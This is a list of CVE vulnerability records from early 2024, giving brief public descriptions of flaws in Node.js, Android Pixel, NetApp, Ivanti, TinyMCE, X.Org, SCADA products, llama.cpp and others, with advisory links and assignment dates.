CVE 2024 22019 Candidate A vulnerability in Node.js HTTP servers allows an attacker to send a specially crafted HTTP request with chunked encoding, leading to resource exhaustion and denial of service (DoS). The server reads an unbounded number of bytes from a single connection, exploiting the lack of limitations on chunk extension bytes. The issue can cause CPU and network bandwidth exhaustion, bypassing standard safeguards like timeouts and body size limits. CONFIRM:https://security.netapp.com/advisory/ntap-20240315-0004/ | MISC:https://hackerone.com/reports/2233486 | URL:https://hackerone.com/reports/2233486 Assigned (20240104)
CVE 2024 22017 Candidate setuid() does not affect libuv's internal io_uring operations if initialized before the call to setuid(). This allows the process to perform privileged operations despite presumably having dropped such privileges through a call to setuid(). This vulnerability affects all users using version greater or equal than Node.js 18.18.0, Node.js 20.4.0 and Node.js 21. MISC:https://hackerone.com/reports/2170226 | URL:https://hackerone.com/reports/2170226 Assigned (20240104)
CVE 2024 22016 Candidate In Rapid Software LLC's Rapid SCADA versions prior to Version 5.8.4, an authorized user can write directly to the Scada directory. This may allow privilege escalation. MISC:https://rapidscada.org/contact/ | URL:https://rapidscada.org/contact/ | MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03 Assigned (20240105)
CVE 2024 22011 Candidate In ss_ProcessRejectComponent of ss_MmConManagement.c, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240103)
CVE 2024 22010 Candidate In dvfs_plugin_caller of fvp.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240103)
CVE 2024 22008 Candidate In config_gov_time_windows of tmu.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240103)
CVE 2024 22007 Candidate In constraint_check of fvp.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240103)
CVE 2024 22006 Candidate OOB read in the TMU plugin that allows for memory disclosure in the power management subsystem of the device. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240103)
CVE 2024 22005 Candidate there is a possible Authentication Bypass due to improperly used crypto. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240103)
CVE 2024 21987 Candidate SnapCenter versions 4.8 prior to 5.0 are susceptible to a vulnerability which could allow an authenticated SnapCenter Server user to modify system logging configuration settings MISC:https://security.netapp.com/advisory/ntap-20240216-0001/ | URL:https://security.netapp.com/advisory/ntap-20240216-0001/ Assigned (20240103)
CVE 2024 21985 Candidate ONTAP 9 versions prior to 9.9.1P18, 9.10.1P16, 9.11.1P13, 9.12.1P10 and 9.13.1P4 are susceptible to a vulnerability which could allow an authenticated user with multiple remote accounts with differing roles to perform actions via REST API beyond their intended privilege. Possible actions include viewing limited configuration details and metrics or modifying limited settings, some of which could result in a Denial of Service (DoS). MISC:https://security.netapp.com/advisory/ntap-20240126-0001/ | URL:https://security.netapp.com/advisory/ntap-20240126-0001/ Assigned (20240103)
CVE 2024 21984 Candidate StorageGRID (formerly StorageGRID Webscale) versions prior to 11.8 are susceptible to a difficult to exploit Reflected Cross-Site Scripting (XSS) vulnerability. Successful exploit requires the attacker to know specific information about the target instance and trick a privileged user into clicking a specially crafted link. This could allow the attacker to view or modify configuration settings or add or modify user accounts. MISC:https://security.netapp.com/advisory/ntap-20240216-0013/ | URL:https://security.netapp.com/advisory/ntap-20240216-0013/ Assigned (20240103)
CVE 2024 21983 Candidate StorageGRID (formerly StorageGRID Webscale) versions prior to 11.8 are susceptible to a Denial of Service (DoS) vulnerability. Successful exploit by an authenticated attacker could lead to an out of memory condition or node reboot. MISC:https://security.netapp.com/advisory/ntap-20240216-0012/ | URL:https://security.netapp.com/advisory/ntap-20240216-0012/ Assigned (20240103)
CVE 2024 21982 Candidate ONTAP versions 9.4 and higher are susceptible to a vulnerability which when successfully exploited could lead to disclosure of sensitive information to unprivileged attackers when the object-store profiler command is being run by an administrative user. MISC:https://security.netapp.com/advisory/ntap-20240111-0001/ | URL:https://security.netapp.com/advisory/ntap-20240111-0001/ Assigned (20240103)
CVE 2024 2197 Candidate Chirp Access improperly stores credentials within its source code, potentially exposing sensitive information to unauthorized access. MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-067-01 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-067-01 Assigned (20240305)
CVE 2024 2194 Candidate The WP Statistics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the URL search parameter in all versions up to, and including, 14.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3047756%40wp-statistics&new=3047756%40wp-statistics&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3047756%40wp-statistics&new=3047756%40wp-statistics&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e44e4bdd-d84e-4315-9232-48a3b240242d?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e44e4bdd-d84e-4315-9232-48a3b240242d?source=cve Assigned (20240305)
CVE 2024 2193 Candidate A Speculative Race Condition (SRC) vulnerability that impacts modern CPU architectures supporting speculative execution (related to Spectre V1) has been disclosed. An unauthenticated attacker can exploit this vulnerability to disclose arbitrary data from the CPU using race conditions to access the speculative executable code paths. CERT-VN:VU#488902 | URL:https://www.kb.cert.org/vuls/id/488902 | FEDORA:FEDORA-2024-3a36322c4b | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZON4TLXG7TG4A2XZG563JMVTGQW4SF3A/ | MISC:https://download.vusec.net/papers/ghostrace_sec24.pdf | URL:https://download.vusec.net/papers/ghostrace_sec24.pdf | MISC:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/patch/?id=944d5fe50f3f03daacfea16300e656a1691c4a23 | URL:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/patch/?id=944d5fe50f3f03daacfea16300e656a1691c4a23 | MISC:https://ibm.github.io/system-security-research-updates/2024/03/12/ghostrace | URL:https://ibm.github.io/system-security-research-updates/2024/03/12/ghostrace | MISC:https://kb.cert.org/vuls/id/488902 | URL:https://kb.cert.org/vuls/id/488902 | MISC:https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7016.html | URL:https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7016.html | MISC:https://www.vusec.net/projects/ghostrace/ | URL:https://www.vusec.net/projects/ghostrace/ | MISC:https://xenbits.xen.org/xsa/advisory-453.html | URL:https://xenbits.xen.org/xsa/advisory-453.html Assigned (20240305)
CVE 2024 21917 Candidate A vulnerability exists in Rockwell Automation FactoryTalk® Service Platform that allows a malicious user to obtain the service token and use it for authentication on another FTSP directory. This is due to the lack of digital signing between the FTSP service token and directory. If exploited, a malicious user could potentially retrieve user information and modify settings without any authentication. MISC:https://www.rockwellautomation.com/en-us/support/advisory.SD1660.html | URL:https://www.rockwellautomation.com/en-us/support/advisory.SD1660.html Assigned (20240103)
CVE 2024 21916 Candidate A denial-of-service vulnerability exists in specific Rockwell Automation ControlLogix ang GuardLogix controllers. If exploited, the product could potentially experience a major nonrecoverable fault (MNRF). The device will restart itself to recover from the MNRF. MISC:https://www.rockwellautomation.com/en-us/support/advisory.SD1661.html | URL:https://www.rockwellautomation.com/en-us/support/advisory.SD1661.html Assigned (20240103)
CVE 2024 21915 Candidate A privilege escalation vulnerability exists in Rockwell Automation FactoryTalk® Service Platform (FTSP). If exploited, a malicious user with basic user group privileges could potentially sign into the software and receive FTSP Administrator Group privileges. A threat actor could potentially read and modify sensitive data, delete data and render the FTSP system unavailable. MISC:https://www.rockwellautomation.com/en-us/support/advisory.SD1662.html | URL:https://www.rockwellautomation.com/en-us/support/advisory.SD1662.html Assigned (20240103)
CVE 2024 21914 Candidate A vulnerability exists in the affected product that allows a malicious user to restart the Rockwell Automation PanelView™ Plus 7 terminal remotely without security protections. If the vulnerability is exploited, it could lead to the loss of view or control of the PanelView™ product. MISC:https://www.rockwellautomation.com/en-us/support/advisory.SD1663.html | URL:https://www.rockwellautomation.com/en-us/support/advisory.SD1663.html Assigned (20240103)
CVE 2024 21911 Candidate TinyMCE versions before 5.6.0 are affected by a stored cross-site scripting vulnerability. An unauthenticated and remote attacker could insert crafted HTML into the editor resulting in arbitrary JavaScript execution in another user's browser. MISC:https://github.com/advisories/GHSA-w7jx-j77m-wp65 | URL:https://github.com/advisories/GHSA-w7jx-j77m-wp65 | MISC:https://github.com/tinymce/tinymce/security/advisories/GHSA-w7jx-j77m-wp65 | URL:https://github.com/tinymce/tinymce/security/advisories/GHSA-w7jx-j77m-wp65 | MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-w7jx-j77m-wp65 | URL:https://vulncheck.com/advisories/vc-advisory-GHSA-w7jx-j77m-wp65 | MISC:https://www.npmjs.com/package/tinymce | URL:https://www.npmjs.com/package/tinymce | MISC:https://www.tiny.cloud/docs/release-notes/release-notes56/#securityfixes | URL:https://www.tiny.cloud/docs/release-notes/release-notes56/#securityfixes Assigned (20240103)
CVE 2024 21910 Candidate TinyMCE versions before 5.10.0 are affected by a cross-site scripting vulnerability. A remote and unauthenticated attacker could introduce crafted image or link URLs that would result in the execution of arbitrary JavaScript in an editing user's browser. MISC:https://github.com/advisories/GHSA-r8hm-w5f7-wj39 | URL:https://github.com/advisories/GHSA-r8hm-w5f7-wj39 | MISC:https://github.com/jazzband/django-tinymce/issues/366 | URL:https://github.com/jazzband/django-tinymce/issues/366 | MISC:https://github.com/jazzband/django-tinymce/releases/tag/3.4.0 | URL:https://github.com/jazzband/django-tinymce/releases/tag/3.4.0 | MISC:https://github.com/tinymce/tinymce/security/advisories/GHSA-r8hm-w5f7-wj39 | URL:https://github.com/tinymce/tinymce/security/advisories/GHSA-r8hm-w5f7-wj39 | MISC:https://pypi.org/project/django-tinymce/3.4.0/ | URL:https://pypi.org/project/django-tinymce/3.4.0/ | MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-r8hm-w5f7-wj39 | URL:https://vulncheck.com/advisories/vc-advisory-GHSA-r8hm-w5f7-wj39 Assigned (20240103)
CVE 2024 21909 Candidate PeterO.Cbor versions 4.0.0 through 4.5.0 are vulnerable to a denial of service vulnerability. An attacker may trigger the denial of service condition by providing crafted data to the DecodeFromBytes or other decoding mechanisms in PeterO.Cbor. Depending on the usage of the library, an unauthenticated and remote attacker may be able to cause the denial of service condition. MISC:https://github.com/advisories/GHSA-6r92-cgxc-r5fg | URL:https://github.com/advisories/GHSA-6r92-cgxc-r5fg | MISC:https://github.com/peteroupc/CBOR/commit/b4117dbbb4cd5a4a963f9d0c9aa132f033e15b95 | URL:https://github.com/peteroupc/CBOR/commit/b4117dbbb4cd5a4a963f9d0c9aa132f033e15b95 | MISC:https://github.com/peteroupc/CBOR/compare/v4.5...v4.5.1 | URL:https://github.com/peteroupc/CBOR/compare/v4.5...v4.5.1 | MISC:https://github.com/peteroupc/CBOR/security/advisories/GHSA-6r92-cgxc-r5fg | URL:https://github.com/peteroupc/CBOR/security/advisories/GHSA-6r92-cgxc-r5fg | MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-6r92-cgxc-r5fg | URL:https://vulncheck.com/advisories/vc-advisory-GHSA-6r92-cgxc-r5fg Assigned (20240103)
CVE 2024 21908 Candidate TinyMCE versions before 5.9.0 are affected by a stored cross-site scripting vulnerability. An unauthenticated and remote attacker could insert crafted HTML into the editor resulting in arbitrary JavaScript execution in another user's browser. MISC:https://github.com/advisories/GHSA-5h9g-x5rv-25wg | URL:https://github.com/advisories/GHSA-5h9g-x5rv-25wg | MISC:https://github.com/tinymce/tinymce/security/advisories/GHSA-5h9g-x5rv-25wg | URL:https://github.com/tinymce/tinymce/security/advisories/GHSA-5h9g-x5rv-25wg | MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-5h9g-x5rv-25wg | URL:https://vulncheck.com/advisories/vc-advisory-GHSA-5h9g-x5rv-25wg | MISC:https://www.tiny.cloud/docs/release-notes/release-notes59/#securityfixes | URL:https://www.tiny.cloud/docs/release-notes/release-notes59/#securityfixes Assigned (20240103)
CVE 2024 21907 Candidate Newtonsoft.Json before version 13.0.1 is affected by a mishandling of exceptional conditions vulnerability. Crafted data that is passed to the JsonConvert.DeserializeObject method may trigger a StackOverflow exception resulting in denial of service. Depending on the usage of the library, an unauthenticated and remote attacker may be able to cause the denial of service condition. MISC:https://alephsecurity.com/2018/10/22/StackOverflowException/ | URL:https://alephsecurity.com/2018/10/22/StackOverflowException/ | MISC:https://alephsecurity.com/vulns/aleph-2018004 | URL:https://alephsecurity.com/vulns/aleph-2018004 | MISC:https://github.com/JamesNK/Newtonsoft.Json/commit/7e77bbe1beccceac4fc7b174b53abfefac278b66 | URL:https://github.com/JamesNK/Newtonsoft.Json/commit/7e77bbe1beccceac4fc7b174b53abfefac278b66 | MISC:https://github.com/JamesNK/Newtonsoft.Json/issues/2457 | URL:https://github.com/JamesNK/Newtonsoft.Json/issues/2457 | MISC:https://github.com/JamesNK/Newtonsoft.Json/pull/2462 | URL:https://github.com/JamesNK/Newtonsoft.Json/pull/2462 | MISC:https://github.com/advisories/GHSA-5crp-9r3c-p9vr | URL:https://github.com/advisories/GHSA-5crp-9r3c-p9vr | MISC:https://security.snyk.io/vuln/SNYK-DOTNET-NEWTONSOFTJSON-2774678 | URL:https://security.snyk.io/vuln/SNYK-DOTNET-NEWTONSOFTJSON-2774678 | MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-5crp-9r3c-p9vr | URL:https://vulncheck.com/advisories/vc-advisory-GHSA-5crp-9r3c-p9vr Assigned (20240103)
CVE 2024 21901 Candidate A SQL injection vulnerability has been reported to affect myQNAPcloud. If exploited, the vulnerability could allow authenticated administrators to inject malicious code via a network. We have already fixed the vulnerability in the following versions: myQNAPcloud 1.0.52 ( 2023/11/24 ) and later QTS 4.5.4.2627 build 20231225 and later MISC:https://www.qnap.com/en/security-advisory/qsa-24-09 | URL:https://www.qnap.com/en/security-advisory/qsa-24-09 Assigned (20240103)
CVE 2024 21900 Candidate An injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.3.2578 build 20231110 and later QuTS hero h5.1.3.2578 build 20231110 and later QuTScloud c5.1.5.2651 and later MISC:https://www.qnap.com/en/security-advisory/qsa-24-09 | URL:https://www.qnap.com/en/security-advisory/qsa-24-09 Assigned (20240103)
CVE 2024 21899 Candidate An improper authentication vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to compromise the security of the system via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.3.2578 build 20231110 and later QTS 4.5.4.2627 build 20231225 and later QuTS hero h5.1.3.2578 build 20231110 and later QuTS hero h4.5.4.2626 build 20231225 and later QuTScloud c5.1.5.2651 and later MISC:https://www.qnap.com/en/security-advisory/qsa-24-09 | URL:https://www.qnap.com/en/security-advisory/qsa-24-09 Assigned (20240103)
CVE 2024 21896 Candidate The permission model protects itself against path traversal attacks by calling path.resolve() on any paths given by the user. If the path is to be treated as a Buffer, the implementation uses Buffer.from() to obtain a Buffer from the result of path.resolve(). By monkey-patching Buffer internals, namely, Buffer.prototype.utf8Write, the application can modify the result of path.resolve(), which leads to a path traversal vulnerability. This vulnerability affects all users using the experimental permission model in Node.js 20 and Node.js 21. Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js. MISC:https://hackerone.com/reports/2218653 | URL:https://hackerone.com/reports/2218653 Assigned (20240103)
CVE 2024 21893 Candidate A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication. MISC:https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US | URL:https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US Assigned (20240103)
CVE 2024 21892 Candidate On Linux, Node.js ignores certain environment variables if those may have been set by an unprivileged user while the process is running with elevated privileges with the only exception of CAP_NET_BIND_SERVICE. Due to a bug in the implementation of this exception, Node.js incorrectly applies this exception even when certain other capabilities have been set. This allows unprivileged users to inject code that inherits the process's elevated privileges. CONFIRM:https://security.netapp.com/advisory/ntap-20240322-0003/ | MISC:https://hackerone.com/reports/2237545 | URL:https://hackerone.com/reports/2237545 Assigned (20240103)
CVE 2024 21891 Candidate Node.js depends on multiple built-in utility functions to normalize paths provided to node:fs functions, which can be overwitten with user-defined implementations leading to filesystem permission model bypass through path traversal attack. This vulnerability affects all users using the experimental permission model in Node.js 20 and Node.js 21. Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js. CONFIRM:https://security.netapp.com/advisory/ntap-20240315-0005/ | MISC:https://hackerone.com/reports/2259914 | URL:https://hackerone.com/reports/2259914 Assigned (20240103)
CVE 2024 21890 Candidate The Node.js Permission Model does not clarify in the documentation that wildcards should be only used as the last character of a file path. For example: ``` --allow-fs-read=/home/node/.ssh/*.pub ``` will ignore `pub` and give access to everything after `.ssh/`. This misleading documentation affects all users using the experimental permission model in Node.js 20 and Node.js 21. Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js. CONFIRM:https://security.netapp.com/advisory/ntap-20240315-0002/ | MISC:https://hackerone.com/reports/2257156 | URL:https://hackerone.com/reports/2257156 Assigned (20240103)
CVE 2024 21888 Candidate A privilege escalation vulnerability in web component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows a user to elevate privileges to that of an administrator. MISC:https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US | URL:https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US Assigned (20240103)
CVE 2024 21887 Candidate A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance. MISC:http://packetstormsecurity.com/files/176668/Ivanti-Connect-Secure-Unauthenticated-Remote-Code-Execution.html | MISC:https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US | URL:https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US Assigned (20240103)
CVE 2024 21886 Candidate A heap buffer overflow flaw was found in the DisableDevice function in the X.Org server. This issue may lead to an application crash or, in some circumstances, remote code execution in SSH X11 forwarding environments. MISC:RHBZ#2256542 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2256542 | MISC:RHSA-2024:0320 | URL:https://access.redhat.com/errata/RHSA-2024:0320 | MISC:RHSA-2024:0557 | URL:https://access.redhat.com/errata/RHSA-2024:0557 | MISC:RHSA-2024:0558 | URL:https://access.redhat.com/errata/RHSA-2024:0558 | MISC:RHSA-2024:0597 | URL:https://access.redhat.com/errata/RHSA-2024:0597 | MISC:RHSA-2024:0607 | URL:https://access.redhat.com/errata/RHSA-2024:0607 | MISC:RHSA-2024:0614 | URL:https://access.redhat.com/errata/RHSA-2024:0614 | MISC:RHSA-2024:0617 | URL:https://access.redhat.com/errata/RHSA-2024:0617 | MISC:RHSA-2024:0621 | URL:https://access.redhat.com/errata/RHSA-2024:0621 | MISC:RHSA-2024:0626 | URL:https://access.redhat.com/errata/RHSA-2024:0626 | MISC:RHSA-2024:0629 | URL:https://access.redhat.com/errata/RHSA-2024:0629 | MISC:https://access.redhat.com/security/cve/CVE-2024-21886 | URL:https://access.redhat.com/security/cve/CVE-2024-21886 Assigned (20240102)
CVE 2024 21885 Candidate A flaw was found in X.Org server. In the XISendDeviceHierarchyEvent function, it is possible to exceed the allocated array length when certain new device IDs are added to the xXIHierarchyInfo struct. This can trigger a heap buffer overflow condition, which may lead to an application crash or remote code execution in SSH X11 forwarding environments. MISC:RHBZ#2256540 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2256540 | MISC:RHSA-2024:0320 | URL:https://access.redhat.com/errata/RHSA-2024:0320 | MISC:RHSA-2024:0557 | URL:https://access.redhat.com/errata/RHSA-2024:0557 | MISC:RHSA-2024:0558 | URL:https://access.redhat.com/errata/RHSA-2024:0558 | MISC:RHSA-2024:0597 | URL:https://access.redhat.com/errata/RHSA-2024:0597 | MISC:RHSA-2024:0607 | URL:https://access.redhat.com/errata/RHSA-2024:0607 | MISC:RHSA-2024:0614 | URL:https://access.redhat.com/errata/RHSA-2024:0614 | MISC:RHSA-2024:0617 | URL:https://access.redhat.com/errata/RHSA-2024:0617 | MISC:RHSA-2024:0621 | URL:https://access.redhat.com/errata/RHSA-2024:0621 | MISC:RHSA-2024:0626 | URL:https://access.redhat.com/errata/RHSA-2024:0626 | MISC:RHSA-2024:0629 | URL:https://access.redhat.com/errata/RHSA-2024:0629 | MISC:https://access.redhat.com/security/cve/CVE-2024-21885 | URL:https://access.redhat.com/security/cve/CVE-2024-21885 Assigned (20240102)
CVE 2024 2188 Candidate Cross-Site Scripting (XSS) vulnerability stored in TP-Link Archer AX50 affecting firmware version 1.0.11 build 2022052. This vulnerability could allow an unauthenticated attacker to create a port mapping rule via a SOAP request and store a malicious JavaScript payload within that rule, which could result in an execution of the JavaScript payload when the rule is loaded. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-tp-link-archer-ax50 | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-tp-link-archer-ax50 Assigned (20240305)
CVE 2024 21875 Candidate Allocation of Resources Without Limits or Throttling vulnerability in Badge leading to a denial of service attack.Team Hacker Hotel Badge 2024 on risc-v (billboard modules) allows Flooding.This issue affects Hacker Hotel Badge 2024: from 0.1.0 through 0.1.3. MISC:https://csirt.divd.nl/CVE-2024-21875 | URL:https://csirt.divd.nl/CVE-2024-21875 | MISC:https://github.com/badgeteam/hackerhotel-2024-firmware-esp32c6/pull/64 | URL:https://github.com/badgeteam/hackerhotel-2024-firmware-esp32c6/pull/64 Assigned (20240102)
CVE 2024 21869 Candidate In Rapid Software LLC's Rapid SCADA versions prior to Version 5.8.4, the affected product stores plaintext credentials in various places. This may allow an attacker with local access to see them. MISC:https://rapidscada.org/contact/ | URL:https://rapidscada.org/contact/ | MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03 Assigned (20240105)
CVE 2024 21866 Candidate In Rapid Software LLC's Rapid SCADA versions prior to Version 5.8.4, the affected product responds back with an error message containing sensitive data if it receives a specific malformed request. MISC:https://rapidscada.org/contact/ | URL:https://rapidscada.org/contact/ | MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03 Assigned (20240105)
CVE 2024 21865 Candidate HGW BL1500HM Ver 002.001.013 and earlier contains a use of week credentials issue. A network-adjacent unauthenticated attacker may connect to the product via SSH and use a shell. MISC:https://jvn.jp/en/vu/JVNVU93546510/ | URL:https://jvn.jp/en/vu/JVNVU93546510/ | MISC:https://www.au.com/support/service/internet/guide/modem/bl1500hm/firmware/ | URL:https://www.au.com/support/service/internet/guide/modem/bl1500hm/firmware/ Assigned (20240318)
CVE 2024 21863 Candidate in OpenHarmony v4.0.0 and prior versions allow a local attacker cause DOS through improper input. MISC:https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md | URL:https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md Assigned (20240106)
CVE 2024 21860 Candidate in OpenHarmony v4.0.0 and prior versions allow an adjacent attacker arbitrary code execution in any apps through use after free. MISC:https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md | URL:https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md Assigned (20240106)
CVE 2024 21852 Candidate In Rapid Software LLC's Rapid SCADA versions prior to Version 5.8.4, an attacker can supply a malicious configuration file by utilizing a Zip Slip vulnerability in the unpacking routine to achieve remote code execution. MISC:https://rapidscada.org/contact/ | URL:https://rapidscada.org/contact/ | MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03 Assigned (20240105)
CVE 2024 21851 Candidate in OpenHarmony v4.0.0 and prior versions allow a local attacker cause heap overflow through integer overflow. MISC:https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md | URL:https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md Assigned (20240106)
CVE 2024 21849 Candidate When an Advanced WAF/ASM security policy and a Websockets profile are configured on a virtual server, undisclosed traffic can cause the Traffic Management Microkernel (TMM) process to terminate. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. MISC:https://my.f5.com/manage/s/article/K000135873 | URL:https://my.f5.com/manage/s/article/K000135873 Assigned (20240201)
CVE 2024 21840 Candidate Incorrect Default Permissions vulnerability in Hitachi Storage Plug-in for VMware vCenter allows local users to read and write specific files. This issue affects Hitachi Storage Plug-in for VMware vCenter: from 04.0.0 through 04.9.2. MISC:https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2024-108/index.html | URL:https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2024-108/index.html Assigned (20240110)
CVE 2024 2184 Candidate Buffer overflow in identifier field of WSD probe request process of Small Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code.*:Satera MF740C Series/Satera MF640C Series/Satera LBP660C Series/Satera LBP620C Series firmware v12.07 and earlier, and Satera MF750C Series/Satera LBP670C Series firmware v03.09 and earlier sold in Japan.Color imageCLASS MF740C Series/Color imageCLASS MF640C Series/Color imageCLASS X MF1127C/Color imageCLASS LBP664Cdw/Color imageCLASS LBP622Cdw/Color imageCLASS X LBP1127C firmware v12.07 and earlier, and Color imageCLASS MF750C Series/Color imageCLASS X MF1333C/Color imageCLASS LBP674Cdw/Color imageCLASS X LBP1333C firmware v03.09 and earlier sold in US.i-SENSYS MF740C Series/i-SENSYS MF640C Series/C1127i Series/i-SENSYS LBP660C Series/i-SENSYS LBP620C Series/C1127P firmware v12.07 and earlier, and i-SENSYS MF750C Series/C1333i Series/i-SENSYS LBP673Cdw/C1333P firmware v03.09 and earlier sold in Europe. MISC:https://psirt.canon/advisory-information/cp2024-002/ | URL:https://psirt.canon/advisory-information/cp2024-002/ Assigned (20240305)
CVE 2024 21838 Candidate Improper neutralization of special elements in output (CWE-74) used by the email generation feature of the Command Centre Server could lead to HTML code injection in emails generated by Command Centre. This issue affects: Gallagher Command Centre 9.00 prior to vEL9.00.1774 (MR2), 8.90 prior to vEL8.90.1751 (MR3), 8.80 prior to vEL8.80.1526 (MR4), 8.70 prior to vEL8.70.2526 (MR6), all version of 8.60 and prior. MISC:https://security.gallagher.com/en-NZ/Security-Advisories/CVE-2024-21838 | URL:https://security.gallagher.com/en-NZ/Security-Advisories/CVE-2024-21838 Assigned (20240205)
CVE 2024 21836 Candidate A heap-based buffer overflow vulnerability exists in the GGUF library header.n_tensors functionality of llama.cpp Commit 18c2e17. A specially crafted .gguf file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability. MISC:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1915 | URL:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1915 Assigned (20240118)
